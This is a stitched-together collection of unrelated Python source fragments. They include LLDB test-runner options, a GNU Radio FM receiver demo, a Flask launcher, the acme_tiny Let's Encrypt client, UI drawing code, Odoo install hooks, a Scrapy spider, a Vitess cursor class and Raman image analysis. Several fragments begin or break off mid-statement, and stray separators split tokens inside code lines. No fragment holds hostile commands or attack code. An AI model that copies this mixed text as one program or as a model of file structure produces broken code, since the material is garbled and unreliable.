X('-v', 'Do verbose mode of unittest framework (print out each test case invocation)')
group.add_argument(
'--enable-crash-dialog',
dest='disable_crash_dialog',
action='store_false',
help='(Windows only) When LLDB crashes, display the Windows crash dialog.')
group.set_defaults(disable_crash_dialog=True)
group = parser.add_argument_group('Parallel execution options')
group.add_argument(
'--inferior',
action='store_true',
help=('specify this invocation is a multiprocess inferior, '
'used internally'))
group.add_argument(
'--no-multiprocess',
action='store_true',
help='skip running the multiprocess test runner')
group.add_argument(
'--threads',
type=int,
dest='num_threads',
default=default_thread_count(),
help=('The number of threads/processes to use when running tests '
'separately, defaults to the number of CPU cores available'))
group.add_argument(
'--test-subdir',
action='store',
help='Specify a test subdirectory to use relative to the test root dir'
)
group.add_argument(
'--test-runner-name',
action='store',
help=('Specify a test runner strategy. Valid values: multiprocessing,'
' multiprocessing-pool, serial, threading, threading-pool')
)
# Test results support.
group = parser.add_argument_group('Test results options')
group.add_argument(
'--curses',
action='store_true',
help='Shortcut for specifying test results using the curses formatter')
group.add_argument(
'--results-file',
action='store',
help=('Specifies the file where test results will be written '
'according to the results-formatter class used'))
group.add_argument(
'--results-port',
action='store',
type=int,
help=('Specifies the localhost port to which the results '
'formatted output should be sent'))
group.add_argument(
'--results-formatter',
action='store',
help=('Specifies the full package/module/class name used to translate '
'test events into some kind of meaningful report, written to '
'the designated output results file-like object'))
group.add_argument(
'--results-formatter-option',
'-O',
action='append',
dest='results_formatter_options',
help=('Specify an option to pass to the formatter. '
'Use --results-formatter-option="--option1=val1" '
'syntax. Note the "=" is critical, don\'t include whitespace.'))
group.add_argument(
'--event-add-entries',
action='store',
help=('Specify comma-separated KEY=VAL entries to add key and value '
'pairs to all test events generated by this test run. VAL may '
'be specified as VAL:TYPE, where TYPE may be int to convert '
'the value to an int'))
# Re-run related arguments
group = parser.add_argument_group('Test Re-run Options')
group.add_argument(
'--rerun-all-issues',
action='store_true',
help=('Re-run all issues that occurred during the test run '
'irrespective of the test method\'s marking as flakey. '
              'Default behavior is to apply re-runs only to flakey '
              'tests that generate issues.'))
|
#!/usr/bin/env python
#
# Copyright 2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# SPDX-License-Identifier: GPL-3.0-or-later
#
#
from gnuradio import gr
from gnuradio import blocks
from gnuradio import filter
from gnuradio import analog
from gnuradio import audio
from gnuradio.filter import firdes
from gnuradio.fft import window
import sys, math
# Create a top_block
class build_graph(gr.top_block):
def __init__(self):
gr.top_block.__init__(self)
input_rate = 200e3 # rate of a broadcast FM station
audio_rate = 44.1e3 # Rate we send the signal to the speaker
# resample from the output of the demodulator to the rate of
# the audio sink.
resamp_rate = audio_rate / input_rate
# use a file as a dummy source. Replace this with a real radio
# receiver to capture signals over-the-air.
src = blocks.file_source(gr.sizeof_gr_complex, "dummy.dat", True)
# Set the demodulator using the same deviation as the receiver.
max_dev = 75e3
fm_demod_gain = input_rate / (2*math.pi*max_dev/8.0)
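        # quadrature_demod_cf scales the per-sample phase difference by this
        # gain; with input_rate = 200e3 and max_dev = 75e3 the expression
        # evaluates to 200e3 / (2*pi*9375) ~= 3.4.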
fm_demod = analog.quadrature_demod_cf(fm_demod_gain)
# Create a filter for the resampler and filter the audio
# signal to 15 kHz. The nfilts is the number of filters in the
# arbitrary resampler. It logically operates at a rate of
# nfilts*input_rate, so we make those adjustments when
# building the filter.
volume = 0.20
nfilts = 32
resamp_taps = firdes.low_pass_2(volume*nfilts, # gain
nfilts*input_rate, # sampling rate
15e3, # low pass cutoff freq
1e3, # width of trans. band
60, # stop band attenuaton
window.WIN_KAISER)
# Build the resampler and filter
resamp_filter = filter.pfb_arb_resampler_fff(resamp_rate,
resamp_taps, nfilts)
        # sound card as final sink. You may have to add a specific
        # device name as a second argument here, something like
        # "pulse" if using pulse audio or "plughw:0,0".
audio_sink = audio.sink(int(audio_rate))
# now wire it all together
self.connect(src, fm_demod)
self.connect(fm_demod, resamp_filter)
self.connect(resamp_filter, (audio_sink,0))
def main(args):
    tb = build_graph()
tb.start() # fork thread and return
input('Press Enter to quit: ')
tb.stop()
if __name__ == '__main__':
main(sys.argv[1:])
|
from atlas_web import app
app.run(debug=True)
|
import argparse, subprocess, json, os, sys, base64, binascii, time, hashlib, re, copy, textwrap, logging
try:
    from urllib.request import urlopen  # Python 3
except ImportError:
    from urllib2 import urlopen  # Python 2
DEFAULT_CA = "https://acme-v01.api.letsencrypt.org"
LOGGER = logging.getLogger(__name__)
LOGGER.addHandler(logging.StreamHandler())
LOGGER.setLevel(logging.INFO)
def get_crt(account_key, csr, acme_dir, log=LOGGER, CA=DEFAULT_CA):
# helper function base64 encode for jose spec
def _b64(b):
return base64.urlsafe_b64encode(b).decode('utf8').replace("=", "")
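        # e.g. _b64(b'\x01\x02') == 'AQI' (base64url with '=' padding stripped)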
# parse account key to get public key
log.info("Parsing account key...")
proc = subprocess.Popen(["openssl", "rsa", "-in", account_key, "-noout", "-text"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
if proc.returncode != 0:
raise IOError("OpenSSL Error: {0}".format(err))
pub_hex, pub_exp = re.search(
r"modulus:\n\s+00:([a-f0-9\:\s]+?)\npublicExponent: ([0-9]+)",
out.decode('utf8'), re.MULTILINE|re.DOTALL).groups()
pub_exp = "{0:x}".format(int(pub_exp))
pub_exp = "0{0}".format(pub_exp) if len(pub_exp) % 2 else pub_exp
header = {
"alg": "RS256",
"jwk": {
"e": _b64(binascii.unhexlify(pub_exp)),
"kty": "RSA",
"n": _b64(binascii.unhexlify(re.sub(r"(\s|:)", "", pub_hex))),
},
}
accountkey_json = json.dumps(header['jwk'], sort_keys=True, separators=(',', ':'))
thumbprint = _b64(hashlib.sha256(accountkey_json.encode('utf8')).digest())
# helper function make signed requests
def _send_signed_request(url, payload):
payload64 = _b64(json.dumps(payload).encode('utf8'))
protected = copy.deepcopy(header)
protected["nonce"] = urlopen(CA + "/directory").headers['Replay-Nonce']
protected64 = _b64(json.dumps(protected).encode('utf8'))
proc = subprocess.Popen(["openssl", "dgst", "-sha256", "-sign", account_key],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate("{0}.{1}".format(protected64, payload64).encode('utf8'))
if proc.returncode != 0:
raise IOError("OpenSSL Error: {0}".format(err))
data = json.dumps({
"header": header, "protected": protected64,
"payload": payload64, "signature": _b64(out),
})
try:
resp = urlopen(url, data.encode('utf8'))
return resp.getcode(), resp.read()
except IOError as e:
return e.code, e.read()
# find domains
log.info("Parsing CSR...")
proc = subprocess.Popen(["openssl", "req", "-in", csr, "-noout", "-text"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
if proc.returncode != 0:
raise IOError("Error loading {0}: {1}".format(csr, err))
domains = set([])
common_name = re.search(r"Subject:.*? CN=([^\s,;/]+)", out.decode('utf8'))
if common_name is not None:
domains.add(common_name.group(1))
subject_alt_names = re.search(r"X509v3 Subject Alternative Name: \n +([^\n]+)\n", out.decode('utf8'), re.MULTILINE|re.DOTALL)
if subject_alt_names is not None:
for san in subject_alt_names.group(1).split(", "):
if san.startswith("DNS:"):
domains.add(san[4:])
# get the certificate domains and expiration
log.info("Registering account...")
code, result = _send_signed_request(CA + "/acme/new-reg", {
"resource": "new-reg",
"agreement": "https://letsencrypt.org/documents/LE-SA-v1.0.1-July-27-2015.pdf",
})
if code == 201:
log.info("Registered!")
elif code == 409:
log.info("Already registered!")
else:
raise ValueError("Error registering: {0} {1}".format(code, result))
# verify each domain
for domain in domains:
log.info("Verifying {0}...".format(domain))
# get new challenge
code, result = _send_signed_request(CA + "/acme/new-authz", {
"resource": "new-authz",
"identifier": {"type": "dns", "value": domain},
})
if code != 201:
raise ValueError("Error requesting challenges: {0} {1}".format(code, result))
# make the challenge file
challenge = [c for c in json.loads(result.decode('utf8'))['challenges'] if c['type'] == "http-01"][0]
token = re.sub(r"[^A-Za-z0-9_\-]", "_", challenge['token'])
keyauthorization = "{0}.{1}".format(token, thumbprint)
wellknown_path = os.path.join(acme_dir, token)
with open(wellknown_path, "w") as wellknown_file:
wellknown_file.write(keyauthorization)
# check that the file is in place
wellknown_url = "http://{0}/.well-known/acme-challenge/{1}".format(domain, token)
try:
resp = urlopen(wellknown_url)
resp_data = resp.read().decode('utf8').strip()
assert resp_data == keyauthorization
except (IOError, AssertionError):
os.remove(wellknown_path)
raise ValueError("Wrote file to {0}, but couldn't download {1}".format(
wellknown_path, wellknown_url))
        # notify that the challenge is met
code, result = _send_signed_request(challenge['uri'], {
"resource": "challenge",
"keyAuthorization": keyauthorization,
})
if code != 202:
raise ValueError("Error triggering challenge: {0} {1}".format(code, result))
# wait for challenge to be verified
while True:
try:
resp = urlopen(challenge['uri'])
challenge_status = json.loads(resp.read().decode('utf8'))
except IOError as e:
raise ValueError("Error checking challenge: {0} {1}".format(
e.code, json.loads(e.read().decode('utf8'))))
if challenge_status['status'] == "pending":
time.sleep(2)
elif challenge_status['status'] == "valid":
log.info("{0} verified!".format(domain))
os.remove(wellknown_path)
break
else:
raise ValueError("{0} challenge did not pass: {1}".format(
domain, challenge_status))
# get the new certificate
log.info("Signing certificate...")
proc = subprocess.Popen(["openssl", "req", "-in", csr, "-outform", "DER"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
csr_der, err = proc.communicate()
code, result = _send_signed_request(CA + "/acme/new-cert", {
"resource": "new-cert",
"csr": _b64(csr_der),
})
if code != 201:
raise ValueError("Error signing certificate: {0} {1}".format(code, result))
# return signed certificate!
log.info("Certificate signed!")
return """-----BEGIN CERTIFICATE-----\n{0}\n-----END CERTIFICATE-----\n""".format(
"\n".join(textwrap.wrap(base64.b64encode(result).decode('utf8'), 64)))
def main(argv):
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description=textwrap.dedent("""\
This script automates the process of getting a signed TLS certificate from
Let's Encrypt using the ACME protocol. It will need to be run on your server
            and have access to your private account key, so PLEASE READ THROUGH IT! It's
only ~200 lines, so it won't take long.
===Example Usage===
            python acme_tiny.py --account-key ./account.key --csr ./domain.csr --acme-dir /usr/share/nginx/html/.well-known/acme-challenge/ > signed.crt
===================
===Example Crontab Renewal (once per month)===
0 0 1 * * python /path/to/acme_tiny.py --account-key /path/to/account.key --csr /path/to/domain.csr --acme-dir /usr/share/nginx/html/.well-known/acme-challenge/ > /path/to/signed.crt 2>> /var/log/acme_tiny.log
==============================================
""")
)
parser.add_argument("--account-key", required=True, help="path to your Let's Encrypt account private key")
parser.add_argument("--csr", required=True, help="path to your certificate signing request")
parser.add_argument("--acme-dir", required=True, help="path to the .well-known/acme-challenge/ directory")
parser.add_argument("--quiet", action="store_const", co |
    #---------------------------------------------------------------------------
def _in_margins ( self, x, y ):
ml = self.margin_left
mb = self.margin_bottom
return xy_in_bounds( x, y, add_rectangles(
self.bounds,
( ml, mb, -(self.margin_right + ml), -(self.margin_top + mb) ) ) )
#---------------------------------------------------------------------------
# Update any information related to the text content of the control:
#---------------------------------------------------------------------------
def update_text ( self ):
text = self.text
if text == '':
self._text = []
self._tdx = []
self._max_tdx = self._tdy = 0
else:
self._text = _text = text.split( '\n' )
gc = self.gc_temp()
gc.set_font( self.font )
max_tdx = 0
self._tdx = _tdx = [ 0 ] * len( _text )
for i, text in enumerate( _text ):
tdx, tdy, descent, leading = gc.get_full_text_extent( text )
tdy += descent + 5
max_tdx = max( max_tdx, tdx )
_tdx[i] = tdx
self._max_tdx = max_tdx
self._tdy = tdy
#---------------------------------------------------------------------------
# Layout and compute the minimum size of the control:
#---------------------------------------------------------------------------
def layout ( self ):
sdx = self.spacing_width
sdy = self.spacing_height
n = len( self._text )
if n == 0:
tdx = tdy = sdx = sdy = 0
else:
tdx = self._max_tdx
tdy = self._tdy * n
image = self._image
if image is not None:
idx = image.width()
idy = image.height()
else:
idx = idy = sdx = sdy = 0
image_position = self.image_position_
if image_position & LEFT_OR_RIGHT:
itdx = tdx + sdx + idx
if image_position & LEFT:
ix = 0
tx = idx + sdx
else:
tx = 0
ix = tdx + sdx
else:
itdx = max( tdx, idx )
ix = (itdx - idx) / 2.0
tx = (itdx - tdx) / 2.0
if image_position & TOP_OR_BOTTOM:
itdy = tdy + sdy + idy
if image_position & TOP:
iy = tdy + sdy
ty = 0
else:
iy = 0
ty = idy + sdy
else:
itdy = max( tdy, idy )
iy = (itdy - idy) / 2.0
ty = (itdy - tdy) / 2.0
bs = 2 * self.border_size
self.min_width = itdx + (self.margin_left + self.margin_right +
self.padding_left + self.padding_right + bs)
self.min_height = itdy + (self.margin_top + self.margin_bottom +
self.padding_top + self.padding_bottom + bs)
self._info = ( ix, iy, idx, idy, tx, ty, tdx, self._tdy, itdx, itdy )
#---------------------------------------------------------------------------
# Draw the contents of the control:
#---------------------------------------------------------------------------
def _draw ( self, gc, view_bounds, mode):
# Set up all the control variables for quick access:
ml = self.margin_left
mr = self.margin_right
mt = self.margin_top
mb = self.margin_bottom
pl = self.padding_left
pr = self.padding_right
pt = self.padding_top
pb = self.padding_bottom
bs = self.border_size
bsd = bs + bs
bsh = bs / 2.0
x, y, dx, dy = self.bounds
ix, iy, idx, idy, tx, ty, tdx, tdy, itdx, itdy = self._info
# Fill the background region (if required);
bg_color = self.bg_color_
if bg_color is not transparent_color:
with gc:
gc.set_fill_color( bg_color )
gc.begin_path()
gc.rect( x + ml + bs, y + mb + bs,
dx - ml - mr - bsd, dy - mb - mt - bsd )
gc.fill_path()
# Draw the border (if required):
if bs > 0:
border_color = self.border_color_
if border_color is not transparent_color:
with gc:
                    gc.set_stroke_color( border_color )
gc.set_line_width( bs )
gc.begin_path()
gc.rect( x + ml + bsh, y + mb + bsh,
dx - ml - mr - bs, dy - mb - mt - bs )
gc.stroke_path()
# Calculate the origin of the image/text box:
text_position = self.text_position_
if self.image_orientation == 'text':
# Handle the 'image relative to text' case:
if text_position & RIGHT:
itx = x + dx - mr - bs - pr - itdx
else:
itx = x + ml + bs + pl
if text_position & HCENTER:
itx += (dx - ml - mr - bsd - pl - pr - itdx) / 2.0
if text_position & TOP:
ity = y + dy - mt - bs - pt - itdy
else:
ity = y + mb + bs + pb
if text_position & VCENTER:
ity += (dy - mb - mt - bsd - pb - pt - itdy) / 2.0
else:
# Handle the 'image relative to component' case:
itx = ity = 0.0
if text_position & RIGHT:
tx = x + dx - mr - bs - pr - tdx
else:
tx = x + ml + bs + pl
if text_position & HCENTER:
tx += (dx - ml - mr - bsd - pl - pr - tdx) / 2.0
if text_position & TOP:
ty = y + dy - mt - bs - pt - tdy
else:
ty = y + mb + bs + pb
if text_position & VCENTER:
ty += (dy - mb - mt - bsd - pb - pt - tdy) / 2.0
image_position = self.image_position_
if image_position & RIGHT:
ix = x + dx - mr - bs - pr - idx
else:
ix = x + ml + bs + pl
if image_position & HCENTER:
ix += (dx - ml - mr - bsd - pl - pr - idx) / 2.0
if image_position & TOP:
iy = y + dy - mt - bs - pt - idy
else:
iy = y + mb + bs + pb
if image_position & VCENTER:
iy += (dy - mb - mt - bsd - pb - pt - idy) / 2.0
with gc:
# Draw the image (if required):
image = self._image
if image is not None:
gc.draw_image( image, ( itx + ix, ity + iy, idx, idy ) )
# Draw the text (if required):
gc.set_font( self.font )
_text = self._text
_tdx = self._tdx
tx += itx
ty += ity + tdy * len( _text )
style = self.style_
shadow_color = self.shadow_color_
text_color = self.color_
for i, text in enumerate( _text ):
ty -= tdy
_tx = tx
if text_position & RIGHT:
_tx += tdx - _tdx[i]
elif text_position & HCENTER:
_tx += (tdx - _tdx[i]) / 2.0
# Draw the 'shadow' text, if requested:
if (style != 0) and (shadow_color is not transparent_color):
if style == EMBOSSED:
gc.set_fill_color( shadow_color )
gc.set_text_position( _tx - 1.0, ty + 1.0 )
elif style == ENGRAVED:
gc.set_fill_color( shadow_color )
gc.set_text_position( _tx + 1.0, ty - 1.0 )
else:
gc.set_fill_color( shadow_color )
gc.set_text_position( _tx + 2.0, ty - 2.0 )
gc.show_text( text )
# Draw the normal text:
gc.set_fill_color( text_color )
                gc.set_text_position( _tx, ty )
                gc.show_text( text )
import _plotly_utils.basevalidators
class BordercolorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(
self, plotly_name="bordercolor", parent_name="sankey.hoverlabel", **kwargs
):
super(BordercolorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
            edit_type=kwargs.pop("edit_type", "calc"),
**kwargs
)
"""App related signal handlers."""
import redis
from django.conf import settings
from django.db.models import signals
from django.dispatch import receiver
from modoboa.admin import models as admin_models
from . import constants
def set_message_limit(instance, key):
"""Store message limit in Redis."""
old_message_limit = instance._loaded_values.get("message_limit")
if old_message_limit == instance.message_limit:
return
rclient = redis.Redis(
host=settings.REDIS_HOST,
        port=settings.REDIS_PORT,
db=settings.REDIS_QUOTA_DB
)
    if instance.message_limit is None:
# delete existing key
if rclient.hexists(constants.REDIS_HASHNAME, key):
rclient.hdel(constants.REDIS_HASHNAME, key)
return
if old_message_limit is not None:
diff = instance.message_limit - old_message_limit
else:
diff = instance.message_limit
rclient.hincrby(constants.REDIS_HASHNAME, key, diff)
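# Illustrative example (values hypothetical): raising a domain's
# message_limit from 100 to 150 issues HINCRBY <REDIS_HASHNAME> <key> 50,
# while setting message_limit back to None deletes the hash field instead.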
@receiver(signals.post_save, sender=admin_models.Domain)
def set_domain_message_limit(sender, instance, created, **kwargs):
"""Store domain message limit in Redis."""
set_message_limit(instance, instance.name)
@receiver(signals.post_save, sender=admin_models.Mailbox)
def set_mailbox_message_limit(sender, instance, created, **kwargs):
"""Store mailbox message limit in Redis."""
set_message_limit(instance, instance.full_address)
# Copyright 2019 Tecnativa - David
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
import logging
from odoo import SUPERUSER_ID, api
_logger = logging.getLogger(__name__)
def pre_init_hook(cr):
"""Speed up the installation of the module on an existing Odoo instance"""
cr.execute(
"""
SELECT column_name
FROM information_schema.columns
WHERE table_name='stock_move' AND
column_name='qty_returnable'
"""
)
if not cr.fetchone():
_logger.info("Creating field qty_returnable on stock_move")
cr.execute(
"""
ALTER TABLE stock_move ADD COLUMN qty_returnable float;
"""
)
cr.execute(
"""
UPDATE stock_move SET qty_returnable = 0
WHERE state IN ('draft', 'cancel')
"""
)
cr.execute(
"""
UPDATE stock_move SET qty_returnable = product_uom_qty
WHERE state = 'done'
"""
)
def post_init_hook(cr, registry):
"""Set moves returnable qty on hand"""
with api.Environment.manage():
env = api.Environment(cr, SUPERUSER_ID, {})
moves_draft = env["stock.move"].search([("state", "in", ["draft", "cancel"])])
moves_no_return_pendant = env["stock.move"].search(
[
("returned_move_ids", "=", False),
("state", "not in", ["draft", "cancel", "done"]),
]
)
moves_by_reserved_availability = {}
for move in moves_no_return_pendant:
            moves_by_reserved_availability.setdefault(move.reserved_availability, [])
            moves_by_reserved_availability[move.reserved_availability].append(move.id)
for qty, ids in moves_by_reserved_availability.items():
cr.execute(
"UPDATE stock_move SET qty_returnable = %s " "WHERE id IN %s",
(qty, tuple(ids)),
)
moves_no_return_done = env["stock.move"].search(
[
("returned_move_ids", "=", False),
("state", "=", "done"),
]
)
# Recursively solve quantities
updated_moves = moves_no_return_done + moves_draft + moves_no_return_pendant
remaining_moves = env["stock.move"].search(
[
("returned_move_ids", "!=", False),
("state", "=", "done"),
]
)
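        # Each pass of the loop below updates only the moves whose returned
        # moves have all been resolved already, so quantities propagate
        # bottom-up through return chains until no move is left.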
while remaining_moves:
_logger.info("{} moves left...".format(len(remaining_moves)))
remaining_moves, updated_moves = update_qty_returnable(
cr, remaining_moves, updated_moves
)
def update_qty_returnable(cr, remaining_moves, updated_moves):
for move in remaining_moves:
if all([x in updated_moves for x in move.returned_move_ids]):
quantity_returned = sum(move.returned_move_ids.mapped("qty_returnable"))
quantity = move.product_uom_qty - quantity_returned
cr.execute(
"UPDATE stock_move SET qty_returnable = %s " "WHERE id = %s",
(quantity, move.id),
)
remaining_moves -= move
updated_moves += move
return remaining_moves, updated_moves
# -*- coding:utf8 -*-
from scrapy import Request
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors import LinkExtractor
from scrapy.loader.processors import Join
from scrapy.loader import ItemLoader
from scrapy.selector import HtmlXPathSelector, Selector
from zadolbali.items import StoryItem
class StoryLoader(ItemLoader):
default_output_processor = Join(' ')
class StoriesSpider(CrawlSpider):
name = 'stories'
allowed_domains = ['zadolba.li']
start_urls = ['http://zadolba.li/']
rules = (
Rule(LinkExtractor(allow=('/[0-9]{8}', )), callback='parse_day', follow=True),
)
def parse_day(self, response):
for url in response.xpath('//div[@class="story"]/h2/a/@href').extract():
request = Request(StoriesSpider.start_urls[0] + str(url)[1:], callback=self.parse_story)
request.meta['date'] = response.url.split('/')[-1]
yield request
def parse_story(self, response):
hxs = HtmlXPathSelector(response)
loader = StoryLoader(StoryItem(), hxs)
loader.add_xpath('id', '//div[@class="story"]/div[@class="id"]/span/text()')
loader.add_xpath('title', '//div[@class="story"]/h1/text()')
        loader.add_value('published', str(response.request.meta['date']))
loader.add_xpath('tags', '//div[@class="story"]/div[@class="meta"]/div[@class="tags"]/ul/li/a/@href')
loader.add_xpath('text', 'string(//div[@class="story"]/div[@class="text"])')
loader.add_xpath('likes', 'string(//div[@class="story"]/div[@c | lass="actions"]//div[@class="rating"])')
loader.add_xpath('hrefs', '//div[@class="story"]/div[@class="text"]//a/@href')
loader.add_value('hrefs', '')
loader.add_value('url', str(response.url))
        return loader.load_item()
import itertools
import re

from vtdb import base_cursor
from vtdb import dbexceptions

write_sql_pattern = re.compile(r'\s*(insert|update|delete)', re.IGNORECASE)
def ascii_lower(string):
"""Lower-case, but only in the ASCII range."""
return string.encode('utf8').lower().decode('utf8')
class VTGateCursorMixin(object):
def connection_list(self):
return [self._conn]
def is_writable(self):
return self._writable
class VTGateCursor(base_cursor.BaseListCursor, VTGateCursorMixin):
"""A cursor for execute statements to VTGate.
Results are stored as a list.
"""
def __init__(
self, connection, tablet_type, keyspace=None,
shards=None, keyspace_ids=None, keyranges=None,
writable=False, as_transaction=False, single_db=False,
twopc=False):
"""Init VTGateCursor.
Args:
connection: A PEP0249 connection object.
tablet_type: Str tablet_type.
      keyspace: Str keyspace or None if batch API will be used.
shards: List of strings.
keyspace_ids: Struct('!Q').packed keyspace IDs.
keyranges: Str keyranges.
writable: True if writable.
as_transaction: True if an executemany call is its own transaction.
      single_db: True if single db transaction is needed.
twopc: True if 2-phase commit is needed.
"""
super(VTGateCursor, self).__init__(single_db=single_db, twopc=twopc)
self._conn = connection
self._writable = writable
self.description = None
self.index = None
self.keyspace = keyspace
self.shards = shards
self.keyspace_ids = keyspace_ids
self.keyranges = keyranges
self.lastrowid = None
self.results = None
self.routing = None
self.rowcount = 0
self.tablet_type = tablet_type
self.as_transaction = as_transaction
self._clear_batch_state()
# pass kwargs here in case higher level APIs need to push more data through
# for instance, a key value for shard mapping
def execute(self, sql, bind_variables, **kwargs):
"""Perform a query, return the number of rows affected."""
self._clear_list_state()
self._clear_batch_state()
if self._handle_transaction_sql(sql):
return
entity_keyspace_id_map = kwargs.pop('entity_keyspace_id_map', None)
entity_column_name = kwargs.pop('entity_column_name', None)
write_query = bool(write_sql_pattern.match(sql))
# NOTE: This check may also be done at higher layers but adding it
# here for completion.
if write_query:
if not self.is_writable():
raise dbexceptions.ProgrammingError('DML on a non-writable cursor', sql)
if entity_keyspace_id_map:
raise dbexceptions.ProgrammingError(
'entity_keyspace_id_map is not allowed for write queries')
# FIXME(alainjobart): the entity_keyspace_id_map should be in the
# cursor, same as keyspace_ids, shards, keyranges, to avoid this hack.
if entity_keyspace_id_map:
shards = None
keyspace_ids = None
keyranges = None
else:
shards = self.shards
keyspace_ids = self.keyspace_ids
keyranges = self.keyranges
self.results, self.rowcount, self.lastrowid, self.description = (
self.connection._execute( # pylint: disable=protected-access
sql,
bind_variables,
tablet_type=self.tablet_type,
keyspace_name=self.keyspace,
shards=shards,
keyspace_ids=keyspace_ids,
keyranges=keyranges,
entity_keyspace_id_map=entity_keyspace_id_map,
entity_column_name=entity_column_name,
not_in_transaction=not self.is_writable(),
effective_caller_id=self.effective_caller_id,
**kwargs))
return self.rowcount
def fetch_aggregate_function(self, func):
return func(row[0] for row in self.fetchall())
def fetch_aggregate(self, order_by_columns, limit):
"""Fetch from many shards, sort, then remove sort columns.
    A scatter query may return up to limit rows. Sort all results
    manually, then return the first rows.
This is a special-use function.
Args:
order_by_columns: The ORDER BY clause. Each element is either a
column, [column, 'ASC'], or [column, 'DESC'].
limit: Int limit.
Returns:
Smallest rows, with up to limit items. First len(order_by_columns)
columns are stripped.
"""
sort_columns = []
desc_columns = []
for order_clause in order_by_columns:
if isinstance(order_clause, (tuple, list)):
sort_columns.append(order_clause[0])
if ascii_lower(order_clause[1]) == 'desc':
desc_columns.append(order_clause[0])
else:
sort_columns.append(order_clause)
# sort the rows and then trim off the prepended sort columns
if sort_columns:
sorted_rows = list(sort_row_list_by_columns(
self.fetchall(), sort_columns, desc_columns))[:limit]
else:
sorted_rows = itertools.islice(self.fetchall(), limit)
neutered_rows = [row[len(order_by_columns):] for row in sorted_rows]
return neutered_rows
def _clear_batch_state(self):
"""Clear state that allows traversal to next query's results."""
self.result_sets = []
self.result_set_index = None
def close(self):
super(VTGateCursor, self).close()
self._clear_batch_state()
def executemany(self, sql, params_list, **kwargs):
"""Execute multiple statements in one batch.
This adds len(params_list) result_sets to self.result_sets. Each
result_set is a (results, rowcount, lastrowid, fields) tuple.
Each call overwrites the old result_sets. After execution, nextset()
is called to move the fetch state to the start of the first
result set.
Args:
sql: The sql text, with %(format)s-style tokens. May be None.
params_list: A list of the keyword params that are normally sent
to execute. Either the sql arg or params['sql'] must be defined.
**kwargs: passed as is to connection._execute_batch.
"""
if sql:
sql_list = [sql] * len(params_list)
else:
sql_list = [params.get('sql') for params in params_list]
bind_variables_list = [params['bind_variables'] for params in params_list]
keyspace_list = [params['keyspace'] for params in params_list]
keyspace_ids_list = [params.get('keyspace_ids') for params in params_list]
shards_list = [params.get('shards') for params in params_list]
self._clear_batch_state()
# Find other _execute_batch calls in test code.
self.result_sets = self.connection._execute_batch( # pylint: disable=protected-access
sql_list, bind_variables_list, keyspace_list, keyspace_ids_list,
shards_list,
self.tablet_type, self.as_transaction, self.effective_caller_id,
**kwargs)
self.nextset()
def nextset(self):
"""Move the fetch state to the start of the next result set.
self.(results, rowcount, lastrowid, description) will be set to
the next result_set, and the fetch-commands will work on this
result set.
Returns:
True if another result set exists, False if not.
"""
if self.result_set_index is None:
self.result_set_index = 0
else:
self.result_set_index += 1
self._clear_list_state()
if self.result_set_index < len(self.result_sets):
self.results, self.rowcount, self.lastrowid, self.description = (
self.result_sets[self.result_set_index])
return True
else:
self._clear_batch_state()
      return False
class StreamVTGateCursor(base_cursor.BaseStreamCursor, VTGateCursorMixin):
"""A cursor for streaming statements to VTGate.
Results are returned as a generator.
"""
def __init__(
self, connection, tablet_type, keyspace=None,
shards=None, keyspace_ids=None,
keyranges=None, writable=False):
super(StreamVTGateCursor, self).__init__()
self._conn = connection
self._writable = writable
self.keyspace = keyspace
self.shards = shards
self.keyspace_ids = keyspace_ids
self.keyranges = keyranges
self.routing = None
self.tablet_type = tablet_type
def is_writable(self):
return self._writable
  # pass kwargs here in case higher level APIs need to push more data through
  # for instance, a key value for shard mapping
    data_decomp_all=nmf.fit_transform(datan)
data_components_all=nmf.components_
return data_decomp_all,data_components_all
def rgb_comp(arr2d, affine=True):
cmy_cmyk=lambda a:a[:3]*(1.-a[3])+a[3]
rgb_cmy=lambda a:1.-a
rgb_cmyk=lambda a:rgb_cmy(cmy_cmyk(a))
return numpy.array([rgb_cmyk(a) for a in arr2d])
def imGen(data_decomp_all,ramaninfod,cmykindeces=[3, 2, 1, 0]):
cmykvals=copy.copy(data_decomp_all[:, cmykindeces])
cmykvals/=cmykvals.max(axis=0)[numpy.newaxis, :]
img=numpy.reshape(rgb_comp(cmykvals), (ramaninfod['xshape'], ramaninfod['yshape'], 3))
return img
def findEdges(img_gray, sigma = 0.33):
#this uses automatic thresholding from one of the cv2 tutorials
v = np.median(img_gray[img_gray>0])
lower = int(max(0, (1.0 - sigma) * v))
upper = int(min(255, (1.0 + sigma) * v))
edges = cv2.Canny(np.uint8(img_gray),lower,upper)
return edges
def findContours(edges):
#the contours are now found by searching the most external convex hull
    #this way most of the not fully closed samples are detected as well
im2, contours, hierarchy = cv2.findContours(edges, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)
iWithContour = cv2.drawContours(edges, contours, -1, (255,20,100), 5)
mapimage = np.zeros_like(edges)
#this fills the contours
for i in range(len(contours)):
cv2.drawContours(mapimage, contours, i, color=255, thickness=-1)
#this is to calculate the center of each contour
x=[]
y=[]
for c in contours:
# compute the center of the contour
M = cv2.moments(c)
try:
x.append(M['m10']/(M['m00']))
y.append(M['m01']/(M['m00']))
        except ZeroDivisionError:
            #this was necessary as the divisor is sometimes 0;
            #yields good results but should be done with caution
            x.append(M['m10']/(M['m00']+1e-23))
            y.append(M['m01']/(M['m00']+1e-23))
return iWithContour, mapimage, contours, x, y
mainapp=QApplication(sys.argv)
form=MainMenu(None, execute=False)
#form.show()
#form.setFocus()
#mainapp.exec_()
parseui=form.parseui
alignui=form.alignui
parseui.rawpathLineEdit.setText(pathd['ramanfile'])
parseui.infopathLineEdit.setText(pathd['infopck'])
parseui.getinfo(ramaninfop=pathd['infopck'], ramanfp=pathd['ramanfile'])#opens or creates
if os.path.isfile(pathd['allspectra']):
with open(pathd['allspectra'], mode='rb') as f:
fullramandataarray=numpy.load(f)
elif 1:
